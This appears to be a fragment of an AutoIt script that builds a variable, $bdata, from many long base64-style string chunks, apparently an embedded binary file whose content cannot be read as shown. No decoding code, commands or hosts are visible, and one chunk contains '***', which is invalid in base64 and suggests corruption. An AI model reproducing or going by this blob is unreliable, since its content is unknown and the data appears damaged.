	$bdata &= "zCRiEFPMn/1zDwEEBgSGmo849tNT/RjUoExwLYBl77GneMGhAPFEComgtaoMKfEiYmMNkZ2YRVGi9cQQiJUcO1SrYSn9kocEMwAM8GysGl5eRVBlwGELm1rCJAD2CTTHJzSxWgwOCzBsYhnoHLGa4kJm+VIM1JQAE/le9Pp75oAQsEYI1PP/MZCxWIZFM8lmAt4wGMy425b5BkOzSL/4m4/Dl2wL9gjivKdfHZlEx/DRAZW0po/61VAHNgF2wI1YwH3DXPi/weSXP+jkvN1Jdq8sgAq0jSFEvcNaSOBhDf3Ifvx5/3BH5Z2wbcNZLUNvBrLi0KsNpMWZTCcTUEN1QkJv2/1ihNHIP/ZA+dwAYKrqOEJepahAsAPajwwxQ24DAA5bTwmxKeNgmLpIBEgIYSt/YvAOrRA8KZ9/4z0ijfIN0D2QounduK8FJEJBXGGWUvnPI4ACj+zvtSmUHQFMHiCEYU4ePODKku2QQLwYuhH/5rPz53GIu"
	$bdata &= "Ugen6//TyolDKhHFtwmu0sG6lv68AvPuL2VfHg0oBWbuFxRescOGiBRewJLpeKTKEo1xexqxRFl7+Hnzi9f1wIQHfD/p6PGrL1swBIhEF5thnt+q55JQdDYmB6BkF45LNsfAzERAC+Mvl0t2BsQQCCwgYYA3s2Asgo/y97DSDbI4ZCAACBxw0hzSHEiAOJDcg34AowSwwJYNLc8gUETT0SS6Xym+5OBc8AkBESF0b5PsLTHlQXxZcI4EGjmzCVAK0gVhew7iApskfaocRCIOkVgihy7CmtDvIrZCaxjDFGLi0DaBf+by1K1dkVmkNq4iW+De4nXTt19K6fddffl6AhOSx4yhcD6utgThT8w3FNJADmT8FyNoJ1nLOBCJJyIfAZND/2WaKMC85NAYwBhAw5HWXQAamEqB04xCKNsggwJ1IAd/CJhKOrm4xHHbplNMS3AaFn6K0SCEhTs8gjjBhQOh3hmDX8CVRHvJryt+VPAInlCRQBAd3"
	$bdata &= "gYKzJBPYGMOWHGs4zF0HzaxF+1IZTFFbkC9HnmABDzwYD5XuKeUO8W/+ged20IDBVQ9LVGGoXZcGWG5cKYaTHBmZSVFUgFIP9UbQ3IQUm8os41fh//YqJLlUaDNmixBmOxF1HmbUJrImABUYMhpRAjvawhhsmij34yHjdd4s4Nj/8FiFQxNR8n/mkgE5NvKzUVSZ5JALApRSbwCTAUAe6kGmYr8Dg79gM7xJWHlI1VDikiMjTCBRJShccoIfYPR0BMWlTQk3smQsPymSseRg2FwFwiQbFLJABlt4TrKKFDAGQAaBbl+gTqD6BQgHdQYTBtPTHmjD/w/CVUMcUAncQ6PkFMn/2a75kM3L7PTs9OiIAnf8HkJOsvxg6IiD7HRdJj4CWwKAGDkaYNALR3TajBu5kMICniYnD0eOHDkQKBQpGCscH+TIkSMgICQyKCWOHDlyLCEwJDQeOC8PfEpHPDsIh2KfUk8CGYMegPfK31WqWmoFSkgnQ"
	$bdata &= "XZMaozLD72zVnpQbZbQRfYAD1gALZZXxPMP6lz/7sJgKIld+YowIP6APv/Ab3+HJt4PdJ6+9eB4FnwWHjbel/0CyVBqDA8KeZx0eBN4JBgI3kwEw/NGv+4EQImUjmQ2HAxEPH8Cb00IOCly2rB0w7jLl4/gP104YVFeM2CAWAL58uWfrnr09O51jV4p5EM+2dmnHyIZh3wQwYv/X0tLb1T58uXLVHVubY+op779+v8hH4F8fHyU19fl6g4B8iQgKY2+G7mWrdDLmnTzqyuG3Hu2HViBWwaCDLwXBrIUGAm/glIJsPFWCF6gNlhqAnPpK1EqxuBWLHYQXNYDaKrJJsIg20mtGIMQl9aoztx/9nlGZgR537peVoB6UH7Rdg0rwdxX1ACWxatAjQSE5A2GkBmurcEK/yKmyB/BjqB9dFgZU4tfEtgH7wR2B5cliRjOIzf54PvifwhdW45WFFL2Atcd7DtGLGc4YV/x5wBiVTBttp2B25ZPBH"
	$bdata &= "PbHstzAMYO2m0I4VUorYH/6BDmkggDGrAUDIEplRAQuOsrQ0EY/NlHHPBI52IFFhOJFgzshgAFkf7ZXxxzxo+2YB8K0ep8bLTvz5NPE97p2Q6IdFrA+79dZH4C2MpAdAbZwt7L6/BW3dpFl+aZr4xRjEybwckKKpUvwd7K2azYyqVz4vcPUAU+ayyf3LYCtX8E3Mjr8t3Y3qrBJwELiVLUn3neER72hZwQLFgICLS0wcJfVoLwvsl0JSwYJdmPgEtmzYY8H2cF934ZeWx2GElRGO4ncIIUSCUmKBR0CjU7c+AEiCM+CEPr4vs6wVCqTjdQIBxXEvHu4NkgnhQgKTFf3tleUxnHBDO5EAAOaDwQH/eWBs+DI/FyOGgYCr6DQDMQOFBHIC5z25AuYFO9l2dMNrhTEAEFAXoG0cjshaRiIPDvT7fyNQxTgXw4UxOMEMhpDS6sk1c/GFd87wc5PFcche3dBaQYCxC4L5i9CHTz62cQ2Oqnu+Z"
	$bdata &= "zO1vY6ac6GN7Kp9hkQdg9Z5qjDhyf6wafYRhm1TjhJFQkh1wul0AkQEAkKe8yM2RdOO4wLc9F7HVxKBS9UHvETN99c+N737nsKNhEP9iXK0CG4kO2/Rk/ACdBpuAEkrq+ATghkgkK2ShcQBCQMM0wsblF8ihlz5qnenC6wD3AwA4Y2F0ubzc+3sMyHBTNWJ4aXJ+RJMI8LTlAJpU8PLglefBtQCF00eNbEEL7zRrBpeTZHq66vcu9Esne4a8g6By5XD5cIHccICDdZEAOHCDZIMkBcgzpICAI7ugMHOVwxZLLeyPTcBhcIYgRpSn8LnIxQ92zIHIcO6hwQQ3i2FZ/4CQ61aAd3HLbnovEk1Qk+oF4KyzcVUyw8d2JhN75u/VafnoYdCrLGH88G1J23+0QUxgbCFfZ7lZlAHMZEhvy2cBbXhHC6xt0YfAocNu5TArB6wLzovJ0V4RvY9gX1s7M7OwUKQhi43ebzuVbqJkE6xlmX/ceDEno"
	$bdata &= "CHMNNODj/G6AeWHY3MHdPDHQi+X94BUuwSUXOIv4NDggNIDsyN4xgPuU/rBYD4H+nroJz7tbgIbWhf8syf8Snk8quc+FwMD8nbKQKv8ADTPbivhfD7bEG5ohAIrK4wgLw/aNdQt5v/CBDkAfdFaq8amCUGg33TQMRIWG+xjhaSgC6PK9yFEVUj4oYYxFjipMICVShWlz4Do4F6xhMHwYjlUxlUg4SN0lf8In8UzDV2oAYOzoY9oIUEhpc/mOfmjJ3N0bICj5eG7gRNwgFjiCTMhzEXJISERXIM8RRExIMoAMIURI1PGg5EhfXoeZjofHU4mGgziRhkgnUVM9gzjv0FekOw+HsFuUMP+hdAC5FmhZh9YAuLU2AdTHhrAj6PZFBP8/BcTa+kB+QGhNsCd4GjQ7h2AktC+PN2IsganiLJ5PRcC9593s/vGHreTtChBsNOPvuH09lTw3D3mh3Mvd9sBiBBn2k7Xne+AIJDdfwZPtxWN6RK/Ag"
	$bdata &= "uTLR/JggFjy8eTZ2aeZkJuvSVtDeI5vKNDOg3y3xpH0995Bt5Bc8LjHksT//+09pPMFcsG0eMTm5tHCzp9y80By7PDVcG+RqKe/vnwkT3x8lPPz99fX5ali+0p3dpeHi6Gdh+Ccm7fF+fn/QT4bBe+fnbk1xT2Afp4A3HxB8Ozixbq5zenn8TJpd4FVSWoQM+CGNtgP0o3XdjKTBm9ixosPoyCzSxo0H/kUhrVnqDVlCZPZy+ubTHLIi+gfBQvbWwlmI5W4o/FbjJxVaM1ubUmz2zJr7f15nMsOEBgMXW1naJEPmELsejljal/FLkgFmf8okUcEVzLAKimlAYMcJOBdkBiOFE7OdCyTIpajzQmAK8/baggW75aPiQaQbJBD9zaRTxcGG4yDTBP/2AQBT5gcuuMYAaU4eGuDzCWJhs4x3QTtgnfybJm8+7wS8BUJtAwfjwtsAPwSnXCtv0Y6YClzgQ1yD2QYn/YEmzIuvR69Z+gqeUwjDl"
	$bdata &= "CKfOoEQABUGHnmA1yEDJTEDgkjEF9wIUQAs2egoA2w5lyr8vZsNPCldgHAW3BV985lt8BYMlxWYBYbeYbOaI+2IxFH0EtIOXwma8ebPbOfM0sVjCc5kCPPyMgznCukqBQJY3lmOaw9JOuZXVO4Mbwoz/s0UnsHMMwqLYzMZlXQP9TYqLPBJQXFFAs+5QTwEg+t2lf8bTyOldS3i08E2QfVmBBSAXZK8a+tK3XOyVS/IyWgHTrDLblJvyUIPd+TrS1sdKLS4k1RNPrgnyYuJYbOmkFIxJXdxUsk9WR8EISXJ+pmFyiz7A30ey+COzm0y7r3Xm7rNxwOt3SXRSuDJYY1RSxJZCEdBuTDUhuUuKW6MvIMjC3XhqSsOs9og+fLDAzHR9KLUHVEMkFk9GM5SCA5UFn5vKWFGWwuZHRQlhLBGHzX9i3vpitVBiKc8TL5LLPZbLgxvBvATcyzkQkec1CX5OgN8HmQzWYp9Fv8G3Wc4Og6bxoUg4Y"
	$bdata &= "HTHEodCarUZQfq15dy40cguQBclxOYAkvHA6/20PcSj06ejt4r3zmuMtM8rFDlsk73YEOdaAUxVdHgAS7VjZT+EodvMcGZYPD6xwBdZ0xXMrCE0Czy21tQh5/KSdNSfBSPFiB+H8nn8b/N8lryTK4H4XrUUAFP+0DIsqL2EnAjTyAA09Dmbn/A1XvYaGtZeEC2XJVlQRma02jAqyK9vYWxuNV9ldQ/Gv/MpuSNmmOiwXqxDaY2bad5qBLk7xgYQScN4rDa25SGNhQ79hGkJD44Z9bESwg19E0gYCfUMtwC9n1gRQmoZ6P6Aq3hkLTafsEzzv5AMSaEniCaP800NHHLjvCfhIsfl0YgNPQx+OeSdg6CnEe7Rr4RcTHhmojAAAG+F/j61K9Livog/0jfgW9DwBMsvAD6IvFYFZI1gP5M7REivAmaCvIInQqwYAuKFhCwv2KSYBIEE7eFjZUcD/wd44LyImOr4FwL9ojKATUmjvKPC4t7SDt"
	$bdata &= "57ZGEA5QwgcIOH8IKgdLw6zUONswrBpqfn9/f2EGCKjGBuHvH+tVjUHVM9uMnMNGEAxFpCMGpuAweBTS+UhMv41z30gjIL8qJIrQwr0UZicYLRgsB0D2lyUYC8GJzE3DFAZN6NnU4RpCmBvC27eykPBbJmB7SGtQOxRf3MlAxUBsFGerKyRIxw/bUiKwEnbvdjmK+i5rndjJMdetAitNwW1jW4MCMtoi3mm31QEJx2rRC9oUHO5ByWseD8tCP7qL13wFE9UGsDT3D4H5GSa5DGml3kEPh3wupJIexlWKngLYaQyl0IzEIyjOxjmuN8eODJnhmoaZXFRHgtQkeKPejMLhSTCD5TyXcJ6aNCQUEMDIO2QoAfxSDBDgUfhRxhyBxs5WNvLCIeM+HA9XkWSVEAggAcItZDHGGAH8DGGID8zHQT58NBUo3/MdnaG5DZMVlyjqfRvC/9BnIgPdx9ZoD18Wi0ZdD6Mh2CDHHKFFNMdWXxcMMYPKT"
	$bdata &= "d5hMAxjYRyEAG5ezkUT1hYmpWKIFgSByg8QGCpDUOXLPmDhoYCELZ1idFBQ1ywggboQG2izIHwesRVYvq/DELo3COPHAYmdSHOp52671OTTEA4OILLIzQWgGx2FmLujNWFowEn/iEgQ7oJ0w8cFI67k2nZZl5/YIm08l1Sk2AytYtgIDanYO1gYimFfBBJbkVhOWWjMs4FFAP8dCAlIfFZ0DgGh7cto2TEcGeLRWJGfcWtY10wpJdZeABLZV1Z9DXYgThjZxSNXo3tKXhGsHwWsKjkkDwWsBawq+crG39oIdDJO1P41fHZKLUGlLEWEFyQ49i4DJwEhRKliqGjho7QQiVYkPb9tXDB8JCtG9CtOJyyIiRhE9zs62gi4HhQbI8No/Zz321P2Wa2osQTC9bswQGkRlxQoMjVBnzgfV4IxkUJJZdmZy9ZrKNer4EgKhFJWBAsFZzZeGFuAQmepU1HmMiBEVAJ1cYQE5m1JHHeqhfEtzhN49R"
	$bdata &= "zgMBUiJclYJRIx3xRdG3yQsytjMFmgHvGuBXQGQJ3Z6oTeCL9ltCuIcEMrDvxWycRhP9pvTaQuu8uvGmlBgDy8ycU7oDQrM3HVxCLB896TchEsGGEfmEPKXARMJ0pmo4IR/8iMZ0A22VSvn2VlC32/k4acwVolv56M4GBqheWhrLtuqFGcNh7l4NwSSwFfDEUk7h3XZOxGP8S4bAwcKaHX5Ah6CJxakqiDFyliwChg/NkgauzH3pHQ2xZRBl+JBo33BQ6JAikOXxcOkAw3P1RjtMBB8kFUi05US+CHokgfpKyLdlRADkQkGaXWwkAAo+SUNlkjjnmBERJuX8MfItkCyQKhPqI8Q42QcKNsH+1+ENeWFA65CC6eLCigJXlwLMNJOCGPHmPM2wMWpVp1/8E6fhRerlaf2dxs1BhHBPDAmvoNB8jmhcYNsFWJ5kgUMYR5FiSkKHG1lpcBKCgfCrSAwTf2LyRT0W5QmPQB84RDGiB3VywTvFK"
	$bdata &= "hvWafKCkkSCWHNtykLF9dOP5zBwqJEG4jiotOHJHEu72EV0YoK/gKJMAgB5qOHFKJAKwvWmOVw8SSXwvB0RiDRIqBgZAYJRtf21uR1g5qLr1kWCzWeJClf8zkKXZD1pLFgTQfnIRef5DOP3nzjPZ2VwxWUkcQi8cC8Qgg3kNwJ/i9FsLcwQRDwcccc151f4vkJVMgYD20IQNyMHYc3LkInlbff2ADE8gDPbS4RlGJYl+6AFZsANfeHBtoblciKKhMhfYV9Y1NQzsU2IhUC8AMTmChrUsC7YNLAtfUYHDv6PFeVgMoIkieFyV4L0JQeHiaDVTeg3WMkgycCMlJOoQgqNzkBJbwsF9jzLpc0AqO/8QmmiXWP6l/jGODeIsJAukSvqOVEO0fCLgytEhrn5s4kJtMEgjfu6K1VBJ01SQQHBB11BJur/GIDgR16RxBCt0mUkE84YHFq9J+JHa2ngGaiUdwArSed7ZbOA+EZlboeS91vVc8Bhgg"
	$bdata &= "eEr2IQ9ujMwAMwHPNR8h3MrX1tYDAwJAUCAnq7MAabRXmbMh3FDagX52KABT+/QvQIcLBJSPxuXia04qBUCNDHvNKfVMfmwzH8ZsMknwIlgkLp+ZrQY0oZQUMUuQaD4hnRIsANNUvM570iSz962ToVX34bZFX38kdDTRXKPg+9sI6axoxgCIdVUXFEk5rLydDlLBTlM/hjx1TKXjNBEVmHF2bY2twc6FUdibmXrttVHrVrUwjxILasFtbGgDRk7arrfBc919vDcgVTirm1V6m9FuU0xR869d3MXBUTtYYR/tFegYa3zuHRKEINOvwHpLhuQXSBjwmkUuVld401F4ltJoP7gUMEqFoFdKACNkibIzYkASF+KCthRxTagsgBPCVKLE/4iha6WfzMMilIiNRLMBDBYaWLgzD2hMhuyDpNboBTQrAa9CWypQnKmmjNgidL8y2jrSKlLCAUV1mxcC+8+rTDGpS9o4SSEwUBC+AJyQ4EKbNW+du"
	$bdata &= "IQXQAF460TXwHaApWze0hZgAfQFwjz3LMW85amxKMuaImPgCR8oE/iLxPsPjiSNAn4BVbfBOBL4njPtqF7WP9aO3ztsi9oryuUWhScBFgyO8c6znxqLtHCYdJIkFvxIyCvNpI788JsGq6jL6ngrxY1cgvxkGWvbflEDBnMCi/4DS9g0r/Bd7gPWwfoHF0tvAGVBAuR0BIh2L5LbRwFfAQG+P4gHh7Vgz10DK/JRwgA1oNp8rP/hxYwLG//EO+gPjDuLgAbPEZIUAcwhYAekAIL5O16Qwz34ZhUghFuE2Vju/sOStCl3cljCFBOSFEnv/2osXgSRVMYHJESK98LdpTU8+BAUCpwIHMufnmTpSS/kIGbaJEX3FQ0mWEsZaT4DKgD4PDSB5yLxLMP/M9tXYzMIPLTTHehxae+0xWD5bEEGJXQkOFZIHfBsIFMYp5yycDj4Tai3FMAAz6LVNAHSXG4xECCZ5ZU7zRSAp1f8NHenR/DpaRnohe"
	$bdata &= "1MrcHr4A1qCewZ6n1ey1bte5ysUY4N4NWOcVUPHwwcotSJC4AbICBrGFURlwCXWFlQ2StrANcNUSUrVB0InWOAzkfsb0YLC1ULNHUKLKB0a0zEHwMvCgd0fx8jXCY+KNhVu3imBTMgGeE34JysoU6uPMDk/WTXdGFqFJkaEfCPQrQHuDvFgIHP4x/v2TVghHaN8O3am1nC6xa3BJkWJA4YwFxVDjB0Rw+/mO10JNaLJXjku0sDGGVQFRTHLgqYGHuukB4FCR88Vr9NLCR2kO9oFvBDBkt5jE5JCYbRVzzDA/aYEm+QRCg9wA9fDk1W4ycLDak/ng51OPOwTgTJaijJN7gBvjIjKHUcM9JlKiBWdWd9Xwr6wcROtVZhUGubHV/Tf1MEDvGyswws8PDiy9iRACCkULNqAQst5JN3BMAQWM+tAokxb1HYpBCAFSJk9D7fwGqGxhAIEVASTg03JHwTR/UFwwgJ9vhZw0g/76QiiBW0vgRHSDw"
	$bdata &= "jJFMIOw9/gF47hu4Efir+BHPsQ62rA/Jo8ggEF7xPqzXmRTYByyxRHDIghy46FyX4y4AjByvIdBmMagBg+8l/0sj/l5SYUHdDXovBWUQdwWGmMF9qAm0HgtNgjwSN8FDiFfZ8FQzlfAZ4DiBe2sKZTf1RJLYwQB6/KB5OW0apMoMpYUwA1JrWo5wVWVEHg7Sf/wECGWmDg74YHA4RaFSg6v/4G0SMK40MGnxFn0hUi9RBjsh/Hd9E4jo7ymLLfDIrwSz4jLdPExQEQoiNFJCOBGIHw2HU+QgEdBRK/eRBhJskEggwffjGv0RXdLZASqDF16NkUHgY59s8Rre6Kf8/QSqDWJ8d6lHvW/jtUWkLtgLXPDpQqnUtCZ9WOvTfz2R8dAvpLW499Hi+vxkK9ByKCCdiEdj9NpBmydkEgrVeoyM7ErGeSInmlBA5/0kadMO9x7wGGMFDXrcs0GyroQ0La8dhiGtYGO7MR/ib9gJLi144bggrXgQr"
	$bdata &= "LnqgXcgBFgeetwAWAgtriw5T98PUE2SJOBOFB7RNNE8EEBeFeKD0FKjRrL0ng7/AarpyslcWTOujeBJIsit22g/W9YnqKotSFNVKBHR3E6ZVK8+JLHUrmxXDDFdTMFbJPBC2o9UxNKOrjLs3oZFGv8MQaxhKJ65bMWEBYBE8E7ZREZ4ZmaVD+SQgGxgILg9PMFZQEo0EsTvmVb+wzDE+CFyFMySiBGLDhLS7z93hN6gpHJ51czkedW+bajis2crEXHB4+OGzzYhc/faDPHwPnicBCCb/9BAkLqRyJDAoBDQFT0MQfsZGHusBpylUsWkcNBwMWlHAx7iq82ZTTLAeFJxQtylcCOxd/K0rzae70MdRoDQ0XyVhiEXgHJ8rxSJQaDAQjAxBa/I8FBAgalrSzAzgTuRWacUibf+BRoD4SFs73wQIA5ZESqiwZGB9i9QRSiNAdcYRIBYudwhcHQLEGLq+IO0K0k7PNW1KbgSIS7gBjACRNTIhB"
	$bdata &= "3IcLBQaLcgAGO23jAAz6fG/IgNVgjIBnJOMpmkECAwQcWs5sNkKhEEgDwFIk6UX7LssYeuBB4A+DIkGCubSKimaDxYYHLAZiQOVf+OFAY6cOPjmMUhnHMZToQxc2pgSnJkjCCijgFWChdvSykHrfP+FF5BSQwkuhJMJ+O4aIIAqAIgjvOfkL/Au9tGJAinoTL0GobgJTOj891dlocnGsHw7B/wGScKGD9BQnY4UY3NbX2dckeA4TcIMgdspQmiNR3QFO3nCZmtRUFJEUYk9YC91NK2LB9d4D5eQBxKDGTTkEJsf3BiSo8jFHzRSJGhqmeRAKHIAAPavCPog8LA60k3l5aPBDlsdcI0SMiFPJDw0RF84CDyGFiiF9LBWNFd3981BtJ1krdh0Et0QyRg8ZgLs3jDCYYc79UYNO/0QMAjSGFdNHgWfLngGiQgZi8NYFRRAny38lPHmgzRPuAOxNXRoltumeUQQH1gQgSXckhjrXPrCseARch"
	$bdata &= "Y+CMY1NsBxealDqXFsLijX3jZOM8wY/hjFBxPWM8Z/zfIuW9/cUExqgVggBoeIxtN1FDhFnjH7hUgwUIEZjU3UxzhZuAsnR9dK4bKFL/eNWiCUkdTkhTd9uriLVdh8Tah7U1JxxveSvl18PNTeFwCfRbwWCwysbgJw2pBFsIeEt01PFZYBUUlVZpckrG5ItmY9+HPRGm796xNmLTaFAwO7E3U+BRdVGI1mSZwmlzSGAgacDQQ2GR+b4AfH4PRo3LAgilpAMTkCA0tDRmQLFQa66Ihs4UPLAr/4w8EtrOhDJ/xVsA1HkWEUT2HAAHsa3WfMoeRxiT/ceBsHtppcy1FECN5HfIYfrFf7NvZ7GXo7qZpJOdEATJ7oV1Vm8yqn/ha/O/uer9VSwmUUU2CrLkq4TBg5sG0kEIADbgVTU62JDkMVtlGOgarRUQs0kgJR701CpapNsjv4cgL0VUGa3oFRj4Xt8FXqYq1UHdJjlzxXEy8QAhQs6/v"
	$bdata &= "RbrVFcRBV6xo761EEViVYvOmDUoBRDeAAh6NfDOJ9K09cCGscG29oLgjgM/baICR6w3QLfr7Q4iGv3650MvnYB4etSxfUzJwc8nYRrnAoGFNfPLwdLCEcVitcCYNBECa91UsLLSLJDF8QAFfIZPxxtrFqHJCfGRghL5b/ZPzICwZZf2UMpIWSR2UMfhxokIUrHH8isBHyZSw2f0hyxa48/zz2IPkQ38K8www/SC6Si0x8AkAIucyHNAdQPzkuH/oFECcfd50OSgBwA0PXAJBoS2e9lAyUR9MBhAtFKR/MCFUpub4fSmliAMUKH5A0CiEeKEHyQQ5lSCiLTigrlQDkTSh+iUUrFDYKJHRC+ZEcCPnFvIt2KMbTJWETdDDO+/90WEpEFUYIqQD1lh/5RCFBgEEa1SKAFerGHL/TOkr239yrBpWAxXSdDXlDJSn0w0AhuXy2dQr5ON8Cwwzc8ZGIVZV/3m4kJMbPyXV8iW+edwyFWnwg4sJE"
	$bdata &= "iasi9A/VVcSBxjPUAqQAdpFKdsiJbhwEhXNTrZQuCAQX2FP+h5QL988NBbiNRliitIA5vYT3faUMFwFVOH4tbmeIKN+bIg+NkkovJOAQdgy4aHxnSuPHNHzYntwpD0cwf0x+JXxfPthX3UBMfVoiSIsEulBvTHzgxLBYRkQHETgrN8wJwRrQeAznWh/tX5yUzhDzHK/8WpOAXydMCQkeTEZXNKNC+Ey0DsJ8Kbh9JLDbgN6+PIKDtqCxkhJMOGhJOsJIDJbHjkWdPX2hOR7XyrTXob59nFQkghfwaEBTt14GDp+ZcLlo9iBsLIkGtWwyJMB2D4LvLHQ98HQ5wp9Swf3WdxSJH1sHTscAXrCIR0ZPCMUWH1tGVwxX618Q2Y4sjKCcC6m81L7uEKDuA6BV9+DgITyoxgtgODClBCi4OgMswQILZhU+BxjEYhkqqkiE+g8u8YmNEAbuoyjCM5zCfjO+MpAgXsLEDqB2MyyHYgrej+KNu4A1h"
	$bdata &= "U0BA9GYj8A3NfxejTyXfNVGrvxpYHQ0bkW2nE7glUG3apgfI4hhA1DrxItHCxvyWvNPIqdmBCjFFs0dODbkEHQKYViJDo00FI2UsBxpg3Jo8HM5RneGH6q0rAPB5ld3Rwx1YYWbUiqLxnAM7VoBVl2NXY8SySMmv90YRDsxnFlVCGzoOBLvFBZsg34np8cT3Qjsv8B8abFk0qbjmzmNFIJ0LeQBfOUYoy23yml7FK1umPcVGNyC0UxKiRiOwIJGC1A7lHW3UgWMPwHIfOuug9wEaahfDFYGO8d57PACaQP8rhsAeMauCqcUghTZy1ww92Fsxok+TRV6wASEEB+SL+LAcJgMFjQIDzV4YlY9DAWu62losq8XN1Az6Ii0w74MtDlvKhEQxBu+jUkRDLxeGEwgcJsBrbdhLyQFYlpXkOvQOl3f3T7gCeQ0jU3Am9uhgYEgycBMEKHNh9Ao6GIYewiEh5mHRQjxDoFoLuiNwFF2YAUEl8griE"
	$bdata &= "okU8iMJ8ALCKKtSHXkmsTSVexdoZfmUlNW7Dld1OB0T8MjLXwUS5R25lHATmFN3NBV3AqHBRME9jTK/w/XhsZegfwinzvOfRWLOIvLbBF/ajuDRezO2cCCIq4Bouvn6A0CsfLryU8a6SA+5HuNVdiJVdTOP8MCYa6Aa+hgIG1E6x7kQypoi6c84Kn/AnkiA4A88BLgwjzASyBaMbw4uLimtZTcJ1eJfSjoBOBSmeSK1BHY4LhGySBTRbgEgsUNkbxXVxHucRwE0crs5ew6AWGjGk3UdAHw2cAC7YT8ddisPpXejuhWUlZ/TeyL3jJoTgFGMggK5BJ6G6+A5A+Dofl5hUqoqHwxXPd5O5VwviRxAcH6B4eIATeXNiEDAkE5MIVOgmMrAi5FMGALgxN0GMalomIyVAHS3IAEYgHXGzAgA82CAplKBhgyd0XVS1/q+IdbDErPjY76Fjk4dRJSSljwsqjsVvxp8LTFPTgQBbyTNEOH/IvQzND"
	$bdata &= "kx0LZhcOgHY3HCTmQD+A7x7iiJrGS1L+90AJQHwhbAilETtrMLA5UeCST3IwpFcDkZwQ55AgBLFGvkj+Mn92zPVkm4AULnmu6wl7EYWVcBtxJiVdR/YlO+GcSYWABJmIGQkXG1dGheQa5GR8sQCCcEsYoV9DcYWAlAVMmhjydF88gY7BKdp/d+cAZZcEFBOeXnTiCHMW0tsMcwyEDXYdcBVgTnMMQFOwuVPevSMFkqM90gHYBw6oKvv78FngKliUgRSAwCcSKAZ+cWMkTAsR8Bjy6jNRHX95B2GEplJMMhhhOc/eA7Kk0K12fBxgwALjxKGkixrRGBMJqxyG0AkUCoRdCydYf3mjFiADaciAQWAE5cdR3UJfdi4V3WEoSLCSfIraCTPbPhCOS4mn/VxQ73xYXOdCWWOKucFx+Om6ulyE4MIUclk18sktsssRRU8U7HZi4M/8MA9jo1VnoQMCNMX0+AgMnvRKaWQgX0Um/ptVDFSR7IeDG"
	$bdata &= "8lBRxIWJLwiiPFtWBK3Qb9IgUl+LbVw7/sZCOABzgsZPRJW2UrlWVkneicxRPjvGdA7LyLjWiXc6NCOsgOY7CAYoixjLbr3VpgcoNHsKXiDwA/jb3A3sf62JAv/WUwSFx0EMVa0lTSUEHFAArUIxHYBsaTEaPwooC09TQBAEBhwLxFuTMHzuGLQVAKoc2X/uAiYKpIHpc9sLGgUfd3VtDBbuPAUJY8NTV1QLxIwlUM4Y1ltHvgLOjHQ9cBUh+6rsN***HzEIXiLmXggXvrUok3osxF9b70U8M/C53BHrxmwAn9idTm0utxBgKHRBZoBIZhFSDEt3gY7bXJEPeDLJtwKRFcDkQpBDTggBLMyRf9MYM8k7wY5UYAvXNuRCDbdVYM4gUApWZBc7EJ0Bdx2WYiMnBxnk0PQYATwGuC51EF4Qn//AdJBK2wjAAisB2VOT5uuVa4cHHtX8CMnJyJMG5AAFwA7LyckEnANyclI56RkCVAEwHLiNp"
	$bdata &= "QDRPX+axqkCH98ztJMcgN9lXNG85iALIZCDwwwE8NY4Pv1Sg8EoROYJlu0QI8ebsMjEUSERGMCDrQyjA0tJHys/OfLWAyeSBo4q8HBnn3KP/1GH/PjYG68FbvKlFIrVenuThhiJBIpfVl4DsE5BZ58h5CA512zYoWQrC3/fWAtjuQKfGIxw0JOryzBIu2wKphHALaIpHcyCKwtX3twr3zMQVmMM+GgEAYDhbSU6IWyexzkkdcKDO39IrCMwezIjyTybiXsJDaqLA/eLmHQDHiwXFl7kkq+d1xUyVhJhA2pGYq5pVDN4dJJkIKsYjLN1BK7QkgyAF40+0yi2TnzedIHIXDJefyRlQFb+0csDT1VRwygMjHPoO166NTjShzUr9x3Cwy/iriRB02vAQYAfyGCNRn5R1B3wo9RvBFXqXZGQB1FMWBG4L0IhTCUC0pHCGd4klkMu9/kMi0NLQzQVfurKqVjgzM5VGsuAzhdaRZD2C4tXxAFKTc"
	$bdata &= "xRVIiA2MWzPokPPmXrVIXWDL2TGQ40tHk203BtC39+TgwrpPLTA1eRdUYLj46Hi8ehS7M2rQUeDEEMDas0DwDlghjWfI2cH8ti3FerRc8LDBvGGMs40ZoOijWf0p5knThYjdDAs1FCldMcV28tLVHNmFhfWGTPyTA6NcIkHLiD/AoQPwLHTFPHAljyrQF01SDWrW/HFVJJAOs/XBgGoJIcWGJmGoeWccCOXwj6awgPhn/HizSqCOwYmxh4xAFWFRCAeEaSHRfbGdIjPeTaZnLQJQF8C4uzXA5BB/8/Ol9sd0kAS4y/jUkdtqsZj2qwtxMdRtfY3G6JKHXNnWAKU4F/i11Kb9FfiiysKKSF/64I9eHB5hBRC/CNX1j8CZc8GxwGwutCanCQBgEBwQKSEK1ZoLBdAQ3LKFXuvEOFtLDrj2UHtWoWhYF5kJIted+4gUQg4EcEY18QgG9RjW9UQ8BH++9rdXA5QyB0azlGCGbLCQsAcCmx4YA"
	$bdata &= "xM9fefAX/PpDQdQ1WH9mMiUe+fGF14Rm5oFb2KXSrS1fMc0+E5eBcRVawTHqqB/i460MFCcc0iQeWJPFSHRoLN6AmEVwIOQrAiK9RVrzcQoxnfZpy+xoUvJzaxBax07zPiU+wEa9I7MdH263PQkhubk8YVxwaMAPSGkRAh4UhX7/f+11ygMAQ6QNzFSUG/YrLO0QJTeARi1cNkQoDpkgFD9sAL0kwEc2gexqJdYC1IBFMug09DDQuwcKmO0VUWeniEcYOdEZTSVzVjIyxz58oZxGBazzGGZo/NmYPPGgGDJe7QmysNs1umSmlfTeaEOednWKYAeXAXHQ4w1rWE0oXPhKe8YBUt30lRGwyPqktq7yDTTOGARzE64kG0hQAX3DO4fxYLFdEnFvA5chY4GiBCccw9xnUeKTpstYkqMtzVq7wHlonVw31cgKcnlwMuREh+FVRSwKlDFAXdDssuHzFD5OaITLOLPv/1xgKBxBYbwlZeTCKGGiV"
